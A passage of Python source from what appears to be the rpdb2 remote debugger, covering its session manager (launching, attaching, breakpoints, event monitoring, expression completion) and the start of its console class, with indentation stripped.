self.m_event_dispatcher_proxy.register_callback(self.on_event_trap, event_type_dict, fSingleUse = False)
self.m_event_dispatcher.register_chain_override(event_type_dict)
event_type_dict = {CEventForkMode: {}}
self.m_event_dispatcher_proxy.register_callback(self.on_event_fork_mode, event_type_dict, fSingleUse = False)
self.m_event_dispatcher.register_chain_override(event_type_dict)
self.m_printer = self.__nul_printer
self.m_last_command_line = None
self.m_last_fchdir = None
self.m_fsynchronicity = True
self.m_ftrap = True
self.m_ffork_into_child = False
self.m_ffork_auto = False
self.m_environment = []
self.m_encoding = ENCODING_AUTO
self.m_fraw = False
def shutdown(self):
self.m_event_dispatcher_proxy.shutdown()
self.m_event_dispatcher.shutdown()
self.m_state_manager.shutdown()
def __nul_printer(self, _str):
pass
def set_printer(self, printer):
self.m_printer = printer
def register_callback(self, callback, event_type_dict, fSingleUse):
return self.m_event_dispatcher.register_callback(callback, event_type_dict, fSingleUse)
def remove_callback(self, callback):
return self.m_event_dispatcher.remove_callback(callback)
def __wait_for_debuggee(self, rid):
try:
time.sleep(STARTUP_TIMEOUT / 2)
for i in range(STARTUP_RETRIES):
try:
print_debug('Scanning for debuggee...')
t0 = time.time()
return self.m_server_list_object.calcList(self.m_rpdb2_pwd, self.m_rid, rid)
except UnknownServer:
dt = time.time() - t0
if dt < STARTUP_TIMEOUT:
time.sleep(STARTUP_TIMEOUT - dt)
continue
return self.m_server_list_object.calcList(self.m_rpdb2_pwd, self.m_rid, rid)
finally:
errors = self.m_server_list_object.get_errors()
self.__report_server_errors(errors, fsupress_pwd_warning = True)
def get_encryption(self):
return self.getSession().get_encryption()
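#
# Launch a new debuggee: spawn a server process running the given
# command line, wait for it to register, and then attach to it. A
# random password is generated if none has been set.
#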
def launch(self, fchdir, command_line, fload_breakpoints = True):
assert(is_unicode(command_line))
self.__verify_unattached()
if not os.name in [POSIX, 'nt']:
self.m_printer(STR_SPAWN_UNSUPPORTED)
raise SpawnUnsupported
if g_fFirewallTest:
firewall_test = CFirewallTest(self.get_remote())
if not firewall_test.run():
raise FirewallBlock
else:
print_debug('Skipping firewall test.')
if self.m_rpdb2_pwd is None:
self.set_random_password()
if command_line == '':
raise BadArgument
(path, filename, args) = split_command_line_path_filename_args(command_line)
#if not IsPythonSourceFile(filename):
# raise NotPythonSource
_filename = my_os_path_join(path, filename)
ExpandedFilename = FindFile(_filename)
self.set_host(LOCALHOST)
self.m_printer(STR_STARTUP_SPAWN_NOTICE)
rid = generate_rid()
create_pwd_file(rid, self.m_rpdb2_pwd)
self.m_state_manager.set_state(STATE_SPAWNING)
try:
try:
self._spawn_server(fchdir, ExpandedFilename, args, rid)
server = self.__wait_for_debuggee(rid)
self.attach(server.m_rid, server.m_filename, fsupress_pwd_warning = True, fsetenv = True, ffirewall_test = False, server = server, fload_breakpoints = fload_breakpoints)
self.m_last_command_line = command_line
self.m_last_fchdir = fchdir
except:
if self.m_state_manager.get_state() != STATE_DETACHED:
self.m_state_manager.set_state(STATE_DETACHED)
raise
finally:
delete_pwd_file(rid)
def restart(self):
"""
Restart the debug session with the same command_line and fchdir
arguments that were used in the last launch.
"""
if None in (self.m_last_fchdir, self.m_last_command_line):
return
if self.m_state_manager.get_state() != STATE_DETACHED:
self.stop_debuggee()
self.launch(self.m_last_fchdir, self.m_last_command_line)
def get_launch_args(self):
"""
Return the command_line and fchdir arguments that were used in the
last launch, as (last_fchdir, last_command_line).
Returns (None, None) if there is no info.
"""
if None in (self.m_last_fchdir, self.m_last_command_line):
return (None, None)
return (self.m_last_fchdir, self.m_last_command_line)
def _spawn_server(self, fchdir, ExpandedFilename, args, rid):
"""
Start an OS console to act as the server.
This starts rpdb2 (this same module) again in a new console, in server-only mode.
"""
if g_fScreen:
name = SCREEN
elif sys.platform == DARWIN:
name = DARWIN
else:
try:
import terminalcommand
name = MAC
except:
name = os.name
if name == 'nt' and g_fDebug:
name = NT_DEBUG
e = ['', ' --encrypt'][not self.m_fAllowUnencrypted]
r = ['', ' --remote'][self.m_fAllowRemote]
c = ['', ' --chdir'][fchdir]
p = ['', ' --pwd="%s"' % self.m_rpdb2_pwd][os.name == 'nt']
b = ''
encoding = detect_locale()
fse = sys.getfilesystemencoding()
ExpandedFilename = g_found_unicode_files.get(ExpandedFilename, ExpandedFilename)
ExpandedFilename = as_unicode(ExpandedFilename, fse)
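# If the expanded filename cannot be represented in the locale encoding
# (its encoded form contains '?' replacement bytes), it is passed to the
# spawned server base64-encoded via the --base64 option instead.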
if as_bytes('?') in as_bytes(ExpandedFilename, encoding, fstrict = False):
_u = as_bytes(ExpandedFilename)
_b = base64.encodestring(_u)
_b = _b.strip(as_bytes('\n')).translate(g_safe_base64_to)
_b = as_string(_b, fstrict = True)
b = ' --base64=%s' % _b
debugger = os.path.abspath(__file__)
if debugger[-1:] == 'c':
debugger = debugger[:-1]
debugger = as_unicode(debugger, fse)
debug_prints = ['', ' --debug'][g_fDebug]
options = '"%s"%s --debugee%s%s%s%s%s --rid=%s "%s" %s' % (debugger, debug_prints, p, e, r, c, b, rid, ExpandedFilename, args)
python_exec = sys.executable
if python_exec.endswith('w.exe'):
python_exec = python_exec[:-5] + '.exe'
python_exec = as_unicode(python_exec, fse)
if as_bytes('?') in as_bytes(python_exec + debugger, encoding, fstrict = False):
raise BadMBCSPath
if name == POSIX:
shell = CalcUserShell()
terminal_command = CalcTerminalCommand()
if terminal_command in osSpawn:
command = osSpawn[terminal_command] % {'shell': shell, 'exec': python_exec, 'options': options}
else:
command = osSpawn[name] % {'term': terminal_command, 'shell': shell, 'exec': python_exec, 'options': options}
else:
command = osSpawn[name] % {'exec': python_exec, 'options': options}
if name == DARWIN:
s = 'cd "%s" ; %s' % (getcwdu(), command)
command = CalcMacTerminalCommand(s)
print_debug('Terminal open string: %s' % repr(command))
command = as_string(command, encoding)
if name == MAC:
terminalcommand.run(command)
else:
subprocess.Popen(command, shell=True)
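#
# Attach to a debuggee identified by 'key' (a rid or a pid). Unless a
# server object is supplied, the server list is scanned for a match.
# On success the saved breakpoints are loaded, unless disabled.
#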
def attach(self, key, name = None, fsupress_pwd_warning = False, fsetenv = False, ffirewall_test = True, server = None, fload_breakpoints = True):
assert(is_unicode(key))
self.__verify_unattached()
if key == '':
raise BadArgument
if self.m_rpdb2_pwd is None:
#self.m_printer(STR_PASSWORD_MUST_BE_SET)
raise UnsetPassword
if g_fFirewallTest and ffirewall_test:
firewall_test = CFirewallTest(self.get_remote())
if not firewall_test.run():
raise FirewallBlock
elif not g_fFirewallTest and ffirewall_test:
print_debug('Skipping firewall test.')
if name is None:
name = key
_name = name
self.m_printer(STR_STARTUP_NOTICE)
self.m_state_manager.set_state(STATE_ATTACHING)
try:
servers = [server]
if server == None:
self.m_server_list_object.calcList(self.m_rpdb2_pwd, self.m_rid)
servers = self.m_server_list_object.findServers(key)
server = servers[0]
_name = server.m_filename
errors = self.m_server_list_object.get_errors()
if not key in [server.m_rid, str(server.m_pid)]:
self.__report_server_errors(errors, fsupress_pwd_warning)
self.__attach(server, fsetenv)
if len(servers) > 1:
self.m_printer(STR_MULTIPLE_DEBUGGEES % key)
self.m_printer(STR_ATTACH_CRYPTO_MODE % ([' ' + STR_ATTACH_CRYPTO_MODE_NOT, ''][self.get_encryption()]))
self.m_printer(STR_ATTACH_SUCCEEDED % server.m_filename)
try:
if fload_breakpoints:
self.load_breakpoints()
except:
pass
except (socket.error, CConnectionException):
self.m_printer(STR_ATTACH_FAILED_NAME % _name)
self.m_state_manager.set_state(STATE_DETACHED)
raise
except:
print_debug_exception()
assert False
def report_exception(self, _type, value, tb):
msg = g_error_mapping.get(_type, STR_ERROR_OTHER)
if _type == SpawnUnsupported and os.name == POSIX and not g_fScreen and g_fDefaultStd:
msg += ' ' + STR_SPAWN_UNSUPPORTED_SCREEN_SUFFIX
if _type == UnknownServer and os.name == POSIX and not g_fScreen and g_fDefaultStd:
msg += ' ' + STR_DISPLAY_ERROR
_str = msg % {'type': _type, 'value': value, 'traceback': tb}
self.m_printer(_str)
if not _type in g_error_mapping:
print_exception(_type, value, tb, True)
def __report_server_errors(self, errors, fsupress_pwd_warning = False):
for k, el in errors.items():
if fsupress_pwd_warning and k in [BadVersion, AuthenticationBadData, AuthenticationFailure]:
continue
if k in [BadVersion]:
for (t, v, tb) in el:
self.report_exception(t, v, None)
continue
(t, v, tb) = el[0]
self.report_exception(t, v, tb)
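#
# Establish the session with the selected server: connect, verify that
# the server's pid and filename match what was advertised, push the
# synchronicity/trap/fork settings, and start the event monitor thread.
#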
def __attach(self, server, fsetenv):
self.__verify_unattached()
session = CSession(self.m_host, server.m_port, self.m_rpdb2_pwd, self.m_fAllowUnencrypted, self.m_rid)
session.Connect()
if (session.getServerInfo().m_pid != server.m_pid) or (session.getServerInfo().m_filename != server.m_filename):
raise UnexpectedData
self.m_session = session
self.m_server_info = self.get_server_info()
self.getSession().getProxy().set_synchronicity(self.m_fsynchronicity)
self.getSession().getProxy().set_trap_unhandled_exceptions(self.m_ftrap)
self.getSession().getProxy().set_fork_mode(self.m_ffork_into_child, self.m_ffork_auto)
if fsetenv and len(self.m_environment) != 0:
self.getSession().getProxy().set_environ(self.m_environment)
self.request_break()
self.refresh(True)
self.__start_event_monitor()
print_debug('Attached to debuggee on port %d.' % session.m_port)
#self.enable_breakpoint([], fAll = True)
def __verify_unattached(self):
if self.__is_attached():
raise AlreadyAttached
def __verify_attached(self):
if not self.__is_attached():
raise NotAttached
def __is_attached(self):
return (self.m_state_manager.get_state() != STATE_DETACHED) and (self.m_session is not None)
def __verify_broken(self):
if self.m_state_manager.get_state() not in [STATE_BROKEN, STATE_ANALYZE]:
raise DebuggerNotBroken
def refresh(self, fSendUnhandled = False):
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
self.m_remote_event_index = self.getSession().getProxy().sync_with_events(fAnalyzeMode, fSendUnhandled)
self.m_breakpoints_proxy.sync()
def __start_event_monitor(self):
self.m_fStop = False
self.m_worker_thread = threading.Thread(target = self.__event_monitor_proc)
#thread_set_daemon(self.m_worker_thread, True)
self.m_worker_thread.start()
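#
# Event monitor loop: repeatedly poll the debuggee for new events
# (rate-limited by IDLE_MAX_RATE), dispatch them locally, and handle
# fork/exec switches, debuggee exit, and connection failures by
# restarting the session or detaching.
#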
def __event_monitor_proc(self):
self.m_worker_thread_ident = thread.get_ident()
t = 0
nfailures = 0
while not self.m_fStop:
try:
t = ControlRate(t, IDLE_MAX_RATE)
if self.m_fStop:
return
(n, sel) = self.getSession().getProxy().wait_for_event(PING_TIMEOUT, self.m_remote_event_index)
if True in [isinstance(e, CEventForkSwitch) for e in sel]:
print_debug('Received fork switch event.')
self.getSession().pause()
threading.Thread(target = self.restart_session_job).start()
if True in [isinstance(e, CEventExecSwitch) for e in sel]:
print_debug('Received exec switch event.')
self.getSession().pause()
threading.Thread(target = self.restart_session_job, args = (True, )).start()
if True in [isinstance(e, CEventExit) for e in sel]:
self.getSession().shut_down()
self.m_fStop = True
if n > self.m_remote_event_index:
#print >> sys.__stderr__, (n, sel)
self.m_remote_event_index = n
self.m_event_dispatcher_proxy.fire_events(sel)
nfailures = 0
except CConnectionException:
if not self.m_fStop:
self.report_exception(*sys.exc_info())
threading.Thread(target = self.detach_job).start()
return
except socket.error:
if nfailures < COMMUNICATION_RETRIES:
nfailures += 1
continue
if not self.m_fStop:
self.report_exception(*sys.exc_info())
threading.Thread(target = self.detach_job).start()
return
def on_event_conflicting_modules(self, event):
s = ', '.join(event.m_modules_list)
self.m_printer(STR_CONFLICTING_MODULES % s)
def on_event_signal_intercept(self, event):
if self.m_state_manager.get_state() in [STATE_ANALYZE, STATE_BROKEN]:
self.m_printer(STR_SIGNAL_INTERCEPT % (event.m_signame, event.m_signum))
def on_event_signal_exception(self, event):
self.m_printer(STR_SIGNAL_EXCEPTION % (event.m_description, event.m_signame, event.m_signum))
def on_event_embedded_sync(self, event):
#
# time.sleep() allows pending break requests to go through...
#
time.sleep(0.001)
self.getSession().getProxy().embedded_sync()
def on_event_exit(self, event):
self.m_printer(STR_DEBUGGEE_TERMINATED)
threading.Thread(target = self.detach_job).start()
def restart_session_job(self, fSendExitOnFailure = False):
try:
self.getSession().restart(sleep = 3)
return
except:
pass
self.m_fStop = True
if fSendExitOnFailure:
e = CEventExit()
self.m_event_dispatcher_proxy.fire_event(e)
return
self.m_printer(STR_LOST_CONNECTION)
self.detach_job()
def detach_job(self):
try:
self.detach()
except:
pass
def detach(self):
self.__verify_attached()
try:
self.save_breakpoints()
except:
print_debug_exception()
pass
self.m_printer(STR_ATTEMPTING_TO_DETACH)
self.m_state_manager.set_state(STATE_DETACHING)
self.__stop_event_monitor()
try:
#self.disable_breakpoint([], fAll = True)
try:
self.getSession().getProxy().set_trap_unhandled_exceptions(False)
self.request_go(fdetach = True)
except DebuggerNotBroken:
pass
finally:
self.m_state_manager.set_state(STATE_DETACHED)
self.m_session = None
self.m_printer(STR_DETACH_SUCCEEDED)
def __stop_event_monitor(self):
self.m_fStop = True
if self.m_worker_thread is not None:
if thread.get_ident() != self.m_worker_thread_ident:
try:
self.getSession().getProxy().null()
except:
pass
self.m_worker_thread.join()
self.m_worker_thread = None
self.m_worker_thread_ident = None
def request_break(self):
self.getSession().getProxy().request_break()
def request_go(self, fdetach = False):
self.getSession().getProxy().request_go(fdetach)
def request_go_breakpoint(self, filename, scope, lineno):
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
self.getSession().getProxy().request_go_breakpoint(filename, scope, lineno, frame_index, fAnalyzeMode)
def request_step(self):
self.getSession().getProxy().request_step()
def request_next(self):
self.getSession().getProxy().request_next()
def request_return(self):
self.getSession().getProxy().request_return()
def request_jump(self, lineno):
self.getSession().getProxy().request_jump(lineno)
def set_breakpoint(self, filename, scope, lineno, fEnabled, expr, encoding = None):
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
if encoding == None:
encoding = self.m_encoding
self.getSession().getProxy().set_breakpoint(filename, scope, lineno, fEnabled, expr, frame_index, fAnalyzeMode, encoding)
def disable_breakpoint(self, id_list, fAll):
self.getSession().getProxy().disable_breakpoint(id_list, fAll)
def enable_breakpoint(self, id_list, fAll):
self.getSession().getProxy().enable_breakpoint(id_list, fAll)
def delete_breakpoint(self, id_list, fAll):
self.getSession().getProxy().delete_breakpoint(id_list, fAll)
def get_breakpoints(self):
self.__verify_attached()
bpl = self.m_breakpoints_proxy.get_breakpoints()
return bpl
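#
# Breakpoints are persisted by pickling the breakpoint list to a file
# derived from the debuggee's module name (see calc_bpl_filename), so
# that load_breakpoints() can restore them on a later attach.
#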
def save_breakpoints(self, filename = ''):
self.__verify_attached()
module_name = self.getSession().getServerInfo().m_module_name
if module_name[:1] == '<':
return
if sys.platform == 'OpenVMS':
#
# The OpenVMS filesystem does not support byte streams.
#
mode = 'w'
else:
mode = 'wb'
path = calc_bpl_filename(module_name + filename)
file = open(path, mode)
try:
try:
bpl = self.get_breakpoints()
sbpl = pickle.dumps(bpl)
file.write(sbpl)
except:
print_debug_exception()
raise CException
finally:
file.close()
def load_breakpoints(self, filename = ''):
self.__verify_attached()
module_name = self.getSession().getServerInfo().m_module_name
if module_name[:1] == '<':
return
if sys.platform == 'OpenVMS':
#
# The OpenVMS filesystem does not support byte streams.
#
mode = 'r'
else:
mode = 'rb'
path = calc_bpl_filename(module_name + filename)
file = open(path, mode)
ferror = False
try:
try:
bpl = pickle.load(file)
self.delete_breakpoint([], True)
except:
print_debug_exception()
raise CException
#
# No breakpoints were found in the file.
#
if filename == '' and len(bpl.values()) == 0:
raise IOError
for bp in bpl.values():
try:
if bp.m_scope_fqn != None:
bp.m_scope_fqn = as_unicode(bp.m_scope_fqn)
if bp.m_filename != None:
bp.m_filename = as_unicode(bp.m_filename)
if bp.m_expr != None:
bp.m_expr = as_unicode(bp.m_expr)
if bp.m_expr in [None, '']:
bp.m_encoding = as_unicode('utf-8')
self.set_breakpoint(bp.m_filename, bp.m_scope_fqn, bp.m_scope_offset, bp.m_fEnabled, bp.m_expr, bp.m_encoding)
except:
print_debug_exception()
ferror = True
if ferror:
raise CException
finally:
file.close()
def on_event_synchronicity(self, event):
ffire = self.m_fsynchronicity != event.m_fsynchronicity
self.m_fsynchronicity = event.m_fsynchronicity
if ffire:
event = CEventSynchronicity(event.m_fsynchronicity)
self.m_event_dispatcher.fire_event(event)
def set_synchronicity(self, fsynchronicity):
self.m_fsynchronicity = fsynchronicity
if self.__is_attached():
try:
self.getSession().getProxy().set_synchronicity(fsynchronicity)
except NotAttached:
pass
event = CEventSynchronicity(fsynchronicity)
self.m_event_dispatcher.fire_event(event)
def get_synchronicity(self):
return self.m_fsynchronicity
def on_event_trap(self, event):
ffire = self.m_ftrap != event.m_ftrap
self.m_ftrap = event.m_ftrap
if ffire:
event = CEventTrap(event.m_ftrap)
self.m_event_dispatcher.fire_event(event)
def set_trap_unhandled_exceptions(self, ftrap):
self.m_ftrap = ftrap
if self.__is_attached():
try:
self.getSession().getProxy().set_trap_unhandled_exceptions(self.m_ftrap)
except NotAttached:
pass
event = CEventTrap(ftrap)
self.m_event_dispatcher.fire_event(event)
def get_trap_unhandled_exceptions(self):
return self.m_ftrap
def is_unhandled_exception(self):
self.__verify_attached()
return self.getSession().getProxy().is_unhandled_exception()
def on_event_fork_mode(self, event):
ffire = ((self.m_ffork_into_child , self.m_ffork_auto) !=
(event.m_ffork_into_child, event.m_ffork_auto))
self.m_ffork_into_child = event.m_ffork_into_child
self.m_ffork_auto = event.m_ffork_auto
if ffire:
event = CEventForkMode(self.m_ffork_into_child, self.m_ffork_auto)
self.m_event_dispatcher.fire_event(event)
def set_fork_mode(self, ffork_into_child, ffork_auto):
self.m_ffork_into_child = ffork_into_child
self.m_ffork_auto = ffork_auto
if self.__is_attached():
try:
self.getSession().getProxy().set_fork_mode(
self.m_ffork_into_child,
self.m_ffork_auto
)
except NotAttached:
pass
event = CEventForkMode(ffork_into_child, ffork_auto)
self.m_event_dispatcher.fire_event(event)
def get_fork_mode(self):
return (self.m_ffork_into_child, self.m_ffork_auto)
def get_stack(self, tid_list, fAll):
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
r = self.getSession().getProxy().get_stack(tid_list, fAll, fAnalyzeMode)
return r
def get_source_file(self, filename, lineno, nlines):
assert(is_unicode(filename))
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
r = self.getSession().getProxy().get_source_file(filename, lineno, nlines, frame_index, fAnalyzeMode)
return r
def get_source_lines(self, nlines, fAll):
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
r = self.getSession().getProxy().get_source_lines(nlines, fAll, frame_index, fAnalyzeMode)
return r
def get_thread_list(self):
(current_thread_id, thread_list) = self.getSession().getProxy().get_thread_list()
return (current_thread_id, thread_list)
def set_thread(self, tid):
self.reset_frame_indexes(None)
self.getSession().getProxy().set_thread(tid)
def get_namespace(self, nl, filter_level, repr_limit):
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
r = self.getSession().getProxy().get_namespace(nl, filter_level, frame_index, fAnalyzeMode, repr_limit, self.m_encoding, self.m_fraw)
return r
def evaluate(self, expr, fclear_completions = True):
assert(is_unicode(expr))
self.__verify_attached()
self.__verify_broken()
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
(value, warning, error) = self.getSession().getProxy().evaluate(expr, frame_index, fAnalyzeMode, self.m_encoding, self.m_fraw)
if fclear_completions:
self.m_completions.clear()
return (value, warning, error)
def execute(self, suite):
assert(is_unicode(suite))
self.__verify_attached()
self.__verify_broken()
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
(warning, error) = self.getSession().getProxy().execute(suite, frame_index, fAnalyzeMode, self.m_encoding)
self.m_completions.clear()
return (warning, error)
def set_encoding(self, encoding, fraw):
if (self.m_encoding, self.m_fraw) == (encoding, fraw):
return
self.m_encoding = encoding
self.m_fraw = fraw
event = CEventEncoding(encoding, fraw)
self.m_event_dispatcher.fire_event(event)
if self.__is_attached():
self.refresh()
def get_encoding(self):
return (self.m_encoding, self.m_fraw)
def set_host(self, host):
self.__verify_unattached()
try:
if not is_unicode(host):
host = host.decode('ascii')
host.encode('ascii')
except:
raise BadArgument
host = as_string(host, 'ascii')
try:
socket.getaddrinfo(host, 0, 0, socket.SOCK_STREAM)
except socket.gaierror:
if host.lower() != LOCALHOST:
raise
#
# Work-around for gaierror: (-8, 'Servname not supported for ai_socktype')
#
return self.set_host(LOOPBACK)
self.m_host = host
self.m_server_list_object = CServerList(host)
def get_host(self):
return as_unicode(self.m_host)
def calc_server_list(self):
if self.m_rpdb2_pwd is None:
raise UnsetPassword
if g_fFirewallTest:
firewall_test = CFirewallTest(self.get_remote())
if not firewall_test.run():
raise FirewallBlock
else:
print_debug('Skipping firewall test.')
server_list = self.m_server_list_object.calcList(self.m_rpdb2_pwd, self.m_rid)
errors = self.m_server_list_object.get_errors()
self.__report_server_errors(errors)
return (server_list, errors)
def get_server_info(self):
return self.getSession().getServerInfo()
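#
# Expression completion: split the text into an optional dotted scope
# and a partial attribute name, evaluate dir(<scope>) (or the global,
# local and builtin names) in the debuggee, cache the result, and
# return the matching completions.
#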
def complete_expression(self, expr):
match = re.search(
r'(?P<unsupported> \.)? (?P<match> ((?P<scope> (\w+\.)* \w+) \.)? (?P<complete>\w*) $)',
expr,
re.U | re.X
)
if match == None:
raise BadArgument
d = match.groupdict()
unsupported, scope, complete = (d['unsupported'], d['scope'], d['complete'])
if unsupported != None:
raise BadArgument
if scope == None:
_scope = as_unicode('list(globals().keys()) + list(locals().keys()) + list(_RPDB2_builtins.keys())')
else:
_scope = as_unicode('dir(%s)' % scope)
if not _scope in self.m_completions:
(v, w, e) = self.evaluate(_scope, fclear_completions = False)
if w != '' or e != '':
print_debug('evaluate() returned the following warning/error: %s' % w + e)
return (expr, [])
cl = list(set(eval(v)))
if '_RPDB2_builtins' in cl:
cl.remove('_RPDB2_builtins')
self.m_completions[_scope] = cl
completions = [attr for attr in self.m_completions[_scope] if attr.startswith(complete)]
completions.sort()
if complete == '':
prefix = expr
else:
prefix = expr[:-len(complete)]
return (prefix, completions)
def _reset_frame_indexes(self, event):
self.reset_frame_indexes(None)
def reset_frame_indexes(self, event):
try:
self.m_state_manager.acquire()
if event is None:
self.__verify_broken()
elif self.m_state_manager.get_state() in [STATE_BROKEN, STATE_ANALYZE]:
return
self.m_stack_depth = None
self.m_stack_depth_exception = None
self.m_frame_index = 0
self.m_frame_index_exception = 0
self.m_completions.clear()
finally:
self.m_state_manager.release()
def set_stack_depth(self, event):
try:
self.m_state_manager.acquire()
self.__verify_broken()
self.m_stack_depth = event.m_stack_depth
self.m_stack_depth_exception = event.m_stack_depth_exception
self.m_frame_index = min(self.m_frame_index, self.m_stack_depth - 1)
self.m_frame_index_exception = min(self.m_frame_index_exception, self.m_stack_depth_exception - 1)
finally:
self.m_state_manager.release()
def set_frame_index(self, frame_index):
try:
self.m_state_manager.acquire()
self.__verify_broken()
if (frame_index < 0) or (self.m_stack_depth is None):
return self.get_frame_index(fLock = False)
if self.m_state_manager.get_state() == STATE_ANALYZE:
self.m_frame_index_exception = min(frame_index, self.m_stack_depth_exception - 1)
si = self.m_frame_index_exception
else:
self.m_frame_index = min(frame_index, self.m_stack_depth - 1)
si = self.m_frame_index
finally:
self.m_state_manager.release()
event = CEventStackFrameChange(si)
self.m_event_dispatcher.fire_event(event)
event = CEventNamespace()
self.m_event_dispatcher.fire_event(event)
return si
def get_frame_index(self, fLock = True):
try:
if fLock:
self.m_state_manager.acquire()
self.__verify_attached()
if self.m_state_manager.get_state() == STATE_ANALYZE:
return self.m_frame_index_exception
else:
return self.m_frame_index
finally:
if fLock:
self.m_state_manager.release()
def set_analyze(self, fAnalyze):
try:
self.m_state_manager.acquire()
if fAnalyze and (self.m_state_manager.get_state() != STATE_BROKEN):
raise DebuggerNotBroken
if (not fAnalyze) and (self.m_state_manager.get_state() != STATE_ANALYZE):
return
state = [STATE_BROKEN, STATE_ANALYZE][fAnalyze]
self.m_state_manager.set_state(state, fLock = False)
finally:
self.m_state_manager.release()
self.refresh()
def getSession(self):
self.__verify_attached()
return self.m_session
def get_state(self):
return as_unicode(self.m_state_manager.get_state())
def set_password(self, _rpdb2_pwd):
assert(is_unicode(_rpdb2_pwd))
if not is_valid_pwd(_rpdb2_pwd):
raise BadArgument
try:
self.m_state_manager.acquire()
self.__verify_unattached()
self.m_rpdb2_pwd = _rpdb2_pwd
finally:
self.m_state_manager.release()
def set_random_password(self):
try:
self.m_state_manager.acquire()
self.__verify_unattached()
self.m_rpdb2_pwd = generate_random_password()
self.m_printer(STR_RANDOM_PASSWORD)
finally:
self.m_state_manager.release()
def get_password(self):
return self.m_rpdb2_pwd
def set_remote(self, fAllowRemote):
try:
self.m_state_manager.acquire()
self.__verify_unattached()
self.m_fAllowRemote = fAllowRemote
finally:
self.m_state_manager.release()
def get_remote(self):
return self.m_fAllowRemote
def set_environ(self, envmap):
self.m_environment = []
try:
for k, v in envmap:
k = as_unicode(k, fstrict = True)
v = as_unicode(v, fstrict = True)
self.m_environment.append((k, v))
except:
raise BadArgument
def get_environ(self):
return self.m_environment
def stop_debuggee(self):
self.__verify_attached()
try:
self.save_breakpoints()
except:
print_debug_exception()
pass
self.m_printer(STR_ATTEMPTING_TO_STOP)
self.m_printer(STR_ATTEMPTING_TO_DETACH)
self.m_state_manager.set_state(STATE_DETACHING)
self.__stop_event_monitor()
try:
self.getSession().getProxy().stop_debuggee()
finally:
self.m_state_manager.set_state(STATE_DETACHED)
self.m_session = None
self.m_printer(STR_DETACH_SUCCEEDED)
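#
# Command-line console of the debugger. Runs a cmd.Cmd loop in its own
# thread, translates user commands into session manager calls, and
# prints session manager events (state, trap, fork and synchronicity
# changes) back to the user.
#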
class CConsoleInternal(cmd.Cmd, threading.Thread):
def __init__(self, session_manager, stdin = None, stdout = None, fSplit = False):
global g_fDefaultStd
cmd.Cmd.__init__(self, stdin = stdin, stdout = stdout)
threading.Thread.__init__(self)
self.fAnalyzeMode = False
self.fPrintBroken = True
self.m_filename = as_unicode('')
self.m_completion_thread = None
self.use_rawinput = [1, 0][fSplit]
self.m_fSplit = fSplit
self.prompt = [[CONSOLE_PROMPT, CONSOLE_PROMPT_ANALYZE][self.fAnalyzeMode], ""][fSplit]
self.intro = CONSOLE_INTRO
if fSplit:
self.intro += '\n'
#thread_set_daemon(self, True)
self.m_session_manager = session_manager
self.m_session_manager.set_printer(self.printer)
event_type_dict = {CEventState: {}}
self.m_session_manager.register_callback(self.event_handler, event_type_dict, fSingleUse = False)
event_type_dict = {CEventSynchronicity: {}}
self.m_session_manager.register_callback(self.synchronicity_handler, event_type_dict, fSingleUse = False)
event_type_dict = {CEventTrap: {}}
self.m_session_manager.register_callback(self.trap_handler, event_type_dict, fSingleUse = False)
event_type_dict = {CEventForkMode: {}}
self.m_session_manager.register_callback(self.fork_mode_handler, event_type_dict, fSingleUse = False)
self.m_last_source_line = None
self.m_last_nlines = DEFAULT_NUMBER_OF_LINES
self.m_fAddPromptBeforeMsg = False
self.m_eInLoop = threading.Event()
self.cmdqueue.insert(0, '')
self.m_stdout = self.stdout
self.m_encoding = detect_encoding(self.stdin)
g_fDefaultStd = (stdin == None)
if self.use_rawinput:
try:
import readline
cd = readline.get_completer_delims()
if not '.' in cd:
readline.set_completer_delims(cd + '.')
except:
pass
def set_filename(self, filename):
assert(is_unicode(filename))
self.m_filename = filename
def precmd(self, line):
line = as_unicode(line, self.m_encoding)
self.m_fAddPromptBeforeMsg = True
if not event_is_set(self.m_eInLoop):
self.m_eInLoop.set()
time.sleep(0.01)
if not line.strip():
return line
command = line.split(' ', 1)[0].split(SOURCE_MORE, 1)[0].split(SOURCE_LESS, 1)[0]
if command not in ['list', 'l']:
self.m_last_source_line = None
self.m_last_nlines = DEFAULT_NUMBER_OF_LINES
return line
def postcmd(self, stop, line):
self.m_fAddPromptBeforeMsg = False
return stop
def onecmd(self, line):
"""
Default error handling and reporting of session manager errors.
"""
try:
return cmd.Cmd.onecmd(self, line)
except (socket.error, CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
print_debug_exception(True)
return False
def default(self, line):
"""
Called on an input line when the command prefix is not recognized.
Overrides the base method in cmd.py.
"""
self.printer(STR_BAD_SYNTAX % line)
def emptyline(self):
pass
def complete(self, text, state):
"""
Return the next possible completion for 'text'.
If a command has not been entered, then complete against command list.
Otherwise try to call complete_<command> to get list of completions.
"""
if self.use_rawinput:
#
# Import cmd to work around a strange bug in Python.
#
import cmd
return cmd.Cmd.complete(self, text, state)
#
# Without rawinput, assume 'text' includes the entire buffer up to the cursor.
#
try:
if state != 0:
return self.completion_matches[state]
if not ' ' in text:
self.completion_matches = self.completenames(text)
return self.completion_matches[state]
cmd, args, foo = self.parseline(text)
if cmd == '' or not hasattr(self, 'complete_' + cmd):
self.completion_matches = self.completedefault(text)
return self.completion_matches[state]
compfunc = getattr(self, 'complete_' + cmd)
self.completion_matches = compfunc(text)
return self.completion_matches[state]
except IndexError:
return None
def complete_launch(self, text, line = None, begidx = None, endidx = None):
if line != None and endidx != None:
text = line[:endidx]
if text.endswith(' '):
dn, bn = '', ''
else:
path = text.split()[-1]
dn, bn = os.path.split(path)
prefix = text
if bn != '':
prefix = prefix[:-len(bn)]
if dn == '' and bn.startswith('~'):
